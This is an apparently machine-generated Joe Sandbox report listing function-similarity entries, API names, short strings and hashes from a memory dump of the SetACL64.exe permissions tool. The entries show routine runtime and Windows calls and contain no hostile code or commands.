                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: String$AllocFree$Uninitialize
                                        • String ID: Jo
                                        • API String ID: 3194604352-866799578
                                        • Opcode ID: fb526238290185d568cb8d2a9593fae541931b6e55344edac3bb91d1d3bb4913
                                        • Instruction ID: aa5320dd3d3cbce4da24ead5ed755035c512155de2b34b93a95f83f627513988
                                        • Opcode Fuzzy Hash: fb526238290185d568cb8d2a9593fae541931b6e55344edac3bb91d1d3bb4913
                                        • Instruction Fuzzy Hash: 281191A2B19646C5FA009B25D19937E2362FF44B84F400439CB0D876A2DF3EEC90C324
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: GenericMask
                                        • String ID: 9$?
                                        • API String ID: 3675760450-2473970582
                                        • Opcode ID: 4c0f5baecf9d6be22cf31ba991dbf6aa8ff0cb5a87ad2c359d2a511522842ea8
                                        • Instruction ID: 5785376efe878dacb5aa4221c11383a7a21655239f9133f165958c1ec066cda9
                                        • Opcode Fuzzy Hash: 4c0f5baecf9d6be22cf31ba991dbf6aa8ff0cb5a87ad2c359d2a511522842ea8
                                        • Instruction Fuzzy Hash: 73114FB2A1C645CBE7219F04F59512A77A1FBC8748F800129F78D46A19DF3ED545CF00
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_task
                                        • String ID:
                                        • API String ID: 3936042273-0
                                        • Opcode ID: 4c107eee0b4e4811bc64223c6d6b2de02e59749188d4f6f301365c20f6b63f69
                                        • Instruction ID: 8d68e9bc892df8ac60e434c35eafee33242aa66fec38608032faab405601f751
                                        • Opcode Fuzzy Hash: 4c107eee0b4e4811bc64223c6d6b2de02e59749188d4f6f301365c20f6b63f69
                                        • Instruction Fuzzy Hash: 8071BDA2B19B41C9EB009F25D5553AC2361FF48B98F408635DB6C837DAEF39E990C350
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: _invalid_parameter_noinfo$_get_daylight
                                        • String ID:
                                        • API String ID: 72036449-0
                                        • Opcode ID: c4ae961d942addcf2b134008d439d8ef08f12080ebcb94819dad5dfadd3a20b1
                                        • Instruction ID: cccc2d220bea4902b49516e5ccbee957c6dc35f7c61e75383f516ab81aebaa12
                                        • Opcode Fuzzy Hash: c4ae961d942addcf2b134008d439d8ef08f12080ebcb94819dad5dfadd3a20b1
                                        • Instruction Fuzzy Hash: CE51D0B3E8C213C3F7A54A69950437A6590BF64754F19403DDA0DCA2E6DE6FEC40C6B2
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: CloseHandle$_invalid_parameter_noinfo_noreturn
                                        • String ID:
                                        • API String ID: 2401491561-0
                                        • Opcode ID: 1486c1b8983b2ca0bcc84f6bab691d8d42c10c3cc9c104c01906a72530798f0a
                                        • Instruction ID: 08d49e2df2e3f0a2c29f6a9a10385b7aaa919bec27922b461d78c4d7d6ecb55b
                                        • Opcode Fuzzy Hash: 1486c1b8983b2ca0bcc84f6bab691d8d42c10c3cc9c104c01906a72530798f0a
                                        • Instruction Fuzzy Hash: 623176E1A59A4AC2FE048B19E8592382312BFC4B95F444939CE4D977F5DF2EEC80C321
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: Event$MutexObjectReleaseResetSingleWait
                                        • String ID:
                                        • API String ID: 2375943032-0
                                        • Opcode ID: 7b46ffe4c5099b2b667e965cb1ff3ada34845c803c41c1e8d10894002ef2c070
                                        • Instruction ID: 27fbe6e02a85d991a3a5b05acd43d6c10f85e549e305bb4016438618cf62c597
                                        • Opcode Fuzzy Hash: 7b46ffe4c5099b2b667e965cb1ff3ada34845c803c41c1e8d10894002ef2c070
                                        • Instruction Fuzzy Hash: 0901D372605A85C6EB448F21E89432973A4FFD8F98F148139CA5D8B3A4DF39D895C350
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: -log
                                        • API String ID: 0-56760616
                                        • Opcode ID: 1eecdd57994f2533d2a3b202c9ec56c7c722615268746318ca363c07f4b769d4
                                        • Instruction ID: b10bbbe4a3c30ac3362eebb641878a329d7734dcc2c009e31e625a2694d3ff5d
                                        • Opcode Fuzzy Hash: 1eecdd57994f2533d2a3b202c9ec56c7c722615268746318ca363c07f4b769d4
                                        • Instruction Fuzzy Hash: D1918BA2B05A41D9EB04CBA5D0402AC23B1FF48B98F90413ADF5D97B98EE3AE855C350
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: __except_validate_context_record
                                        • String ID: csm$csm
                                        • API String ID: 1467352782-3733052814
                                        • Opcode ID: 140bdb4f9088bb5670319dceb203d8db25e3c3c3cfd3d3b344dc43606597f418
                                        • Instruction ID: 03b7e931ce37f77c21c16ca5474bfc5bdad4b3c3090f90bcdad293da0b43d54b
                                        • Opcode Fuzzy Hash: 140bdb4f9088bb5670319dceb203d8db25e3c3c3cfd3d3b344dc43606597f418
                                        • Instruction Fuzzy Hash: 7571A0B2A18681C6DB208B25D4587797BA1FF04F98F04813ADF4D87A85DE2ED891C7A1
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: EncodePointer
                                        • String ID: MOC$RCC
                                        • API String ID: 2118026453-2084237596
                                        • Opcode ID: 2b0c2825179cba656fd1c1b471b4941425bc7ec70a51c4e696d4729a40678a82
                                        • Instruction ID: 6622aa697c78868c016a174783b3e72fdd57741daf28997e75b0ac04d2d585f3
                                        • Opcode Fuzzy Hash: 2b0c2825179cba656fd1c1b471b4941425bc7ec70a51c4e696d4729a40678a82
                                        • Instruction Fuzzy Hash: DB518CB2A18A85CAEB10CF65E0447AD77A0FB44B8CF040129EF4E97B59CF79E885C711
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: ?\UNC\$\\?
                                        • API String ID: 0-2035776247
                                        • Opcode ID: a4f302d2082b19bd39a44b1874956c81c3294110edb74e814a97884128a82e9b
                                        • Instruction ID: 963376fa87eece7bbca4b7ca45457826e183469344a4a399e746a966070470a6
                                        • Opcode Fuzzy Hash: a4f302d2082b19bd39a44b1874956c81c3294110edb74e814a97884128a82e9b
                                        • Instruction Fuzzy Hash: 7341B3A2F18656C6FE149F61C0683FD2362FF24798F80013ADA5E977D5DE2E9980C364
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                        • String ID: tss
                                        • API String ID: 73155330-1638339373
                                        • Opcode ID: 7b158194c5e526a4a18f9fad0e2b90092b2974379bf3b45cd8f3baac7b0ba31a
                                        • Instruction ID: 94174e2e4901ad88a0d017064c5fcae7c4ea7724da16939e5c61bafd194ee3a2
                                        • Opcode Fuzzy Hash: 7b158194c5e526a4a18f9fad0e2b90092b2974379bf3b45cd8f3baac7b0ba31a
                                        • Instruction Fuzzy Hash: D441EFA2B19A82C6EA04DB12965417D2260FF54BE0F580639DB2D87BD5DF7EE891C320
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: CreateFrameInfo__except_validate_context_record
                                        • String ID: csm
                                        • API String ID: 2558813199-1018135373
                                        • Opcode ID: bff377e20215f6bbc56ca34a453ae38d57878f3cd995b74642c36c42e48d33ca
                                        • Instruction ID: ec1dfed0ba654f773ce06889592c95e2821d89ae63eb6b50d8fed0f16756dbe2
                                        • Opcode Fuzzy Hash: bff377e20215f6bbc56ca34a453ae38d57878f3cd995b74642c36c42e48d33ca
                                        • Instruction Fuzzy Hash: C2518EB2628741C7E661EF15E14426E77A4FB88B94F100138EB8D87B55DF3EE860CB61
                                        APIs
                                        • _invalid_parameter_noinfo.LIBCMT ref: 00007FF68687297E
                                          • Part of subcall function 00007FF686875054: HeapFree.KERNEL32(?,?,00007FF6868734C7,00007FF686874ADC,?,?,?,00007FF686874E5F,?,?,0000F23FCA72FB90,00007FF686875874,?,?,?,00007FF6868757A7), ref: 00007FF68687506A
                                          • Part of subcall function 00007FF686875054: GetLastError.KERNEL32(?,?,00007FF6868734C7,00007FF686874ADC,?,?,?,00007FF686874E5F,?,?,0000F23FCA72FB90,00007FF686875874,?,?,?,00007FF6868757A7), ref: 00007FF68687507C
                                        • GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF68686226D), ref: 00007FF68687299C
                                        Strings
                                        • C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe, xrefs: 00007FF68687298A
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
                                        • String ID: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe
                                        • API String ID: 3580290477-1081327875
                                        • Opcode ID: aa599a36ba6a0968a49bd794e7a1571458fa8a1e1b45d82a3122116992cc5e68
                                        • Instruction ID: cb93066af07acc480890487f2fd02d3b0337f205547dfb4e1d21bf9540769f9e
                                        • Opcode Fuzzy Hash: aa599a36ba6a0968a49bd794e7a1571458fa8a1e1b45d82a3122116992cc5e68
                                        • Instruction Fuzzy Hash: 41416AB2B08B12C6EB15EF25A8911BC66A5BF44794F544039EA4E87B95DF3EE841C320
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: ErrorFileLastWrite
                                        • String ID: U
                                        • API String ID: 442123175-4171548499
                                        • Opcode ID: d59aa33b38612ae6739f83d51169c656099beb2d3f667978864e56d4317c1a25
                                        • Instruction ID: be0f0e3c752545e407cff98b5d5036d92789129bb31d9a3d23b06db1f2f08686
                                        • Opcode Fuzzy Hash: d59aa33b38612ae6739f83d51169c656099beb2d3f667978864e56d4317c1a25
                                        • Instruction Fuzzy Hash: 5541B162B28A45C6EB208F65F4483A967A1FB987C4F444039EE4DC7798EF7DD841C750
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: _handle_errorf
                                        • String ID: "$powf
                                        • API String ID: 2315412904-603753351
                                        • Opcode ID: 4c8a7104b5368009bc02c85030aff32139670d494d3475396f94041b1bf7d79b
                                        • Instruction ID: 4ebfa0df4c46d01f5ecd67c7c0abf9958f84d8037a1ac03cfb70c7f1fa20e618
                                        • Opcode Fuzzy Hash: 4c8a7104b5368009bc02c85030aff32139670d494d3475396f94041b1bf7d79b
                                        • Instruction Fuzzy Hash: 45411FB3928680DED370CF22E4847AAB6A0FB99348F101329F749429A8CF7DD955DB54
                                        APIs
                                          • Part of subcall function 00007FF68687DE6C: _invalid_parameter_noinfo.LIBCMT ref: 00007FF68687DE8E
                                        • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68685E2EA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: _invalid_parameter_noinfo_invalid_parameter_noinfo_noreturn
                                        • String ID: rt, ccs=UNICODE$wt, ccs=UNICODE
                                        • API String ID: 1705651295-2937027470
                                        • Opcode ID: 935450736d1db829583b36a6614573cb82d4dc60051ad41040f15e431cbeb578
                                        • Instruction ID: 23e0e62f27e4a9e067a5a4a47cd3369cba0313a975cbd9868a7ecd8eb31dc154
                                        • Opcode Fuzzy Hash: 935450736d1db829583b36a6614573cb82d4dc60051ad41040f15e431cbeb578
                                        • Instruction Fuzzy Hash: 0D3172B2A18B42C2EA10DB18F89D22D6261FF88784F500139E69E87699DF3EED50C750
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: _handle_error
                                        • String ID: "$pow
                                        • API String ID: 1757819995-713443511
                                        • Opcode ID: 1ec19b026a6bd8f63a67ca0b1a3ee6df7a61ad1018684fb431e5833eb4d51299
                                        • Instruction ID: d421cb50a5e101570975d6890cdbb991b73f925726bc7ceccccea42ac5f980dd
                                        • Opcode Fuzzy Hash: 1ec19b026a6bd8f63a67ca0b1a3ee6df7a61ad1018684fb431e5833eb4d51299
                                        • Instruction Fuzzy Hash: 04313EB2D18A89C6D770CF10E04067AAAB2FFDA344F201329F78946A54CF7ED485DB10
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: FormatFreeLocalMessage
                                        • String ID: asio.system error
                                        • API String ID: 1427518018-3828095645
                                        • Opcode ID: 10628e73ec9175718b0e5b4b763344832475aea0b876288d78f2d80f17bd1f45
                                        • Instruction ID: 9b7d18b85764b15441530728611a28be08abd42dec1d97cbb1d77a1700146f3d
                                        • Opcode Fuzzy Hash: 10628e73ec9175718b0e5b4b763344832475aea0b876288d78f2d80f17bd1f45
                                        • Instruction Fuzzy Hash: 6021A0B2608B95C6F7108B19E9403297BA6FB41BD0F444229DB9D47BE4CF7ED8A1CB50
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: CloseHandleLocalTime
                                        • String ID: %04d-%02d-%02d %02d-%02d-%02d-%03d
                                        • API String ID: 655981579-2017722003
                                        • Opcode ID: daa5ccae675e1664e87c3d862e659ce2e173f1fd8162f8e579eca52e1a44dbca
                                        • Instruction ID: ccee10826c6dd9bdcd7a2f993900d55631ef3d9d957c505170f7f4d5d078b6fa
                                        • Opcode Fuzzy Hash: daa5ccae675e1664e87c3d862e659ce2e173f1fd8162f8e579eca52e1a44dbca
                                        • Instruction Fuzzy Hash: 9E31B132A14B81D9E7208F71E8807DC3BB4FF44798F205128EE8967B28DF3996A5D344
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: _set_errno_from_matherr
                                        • String ID: exp
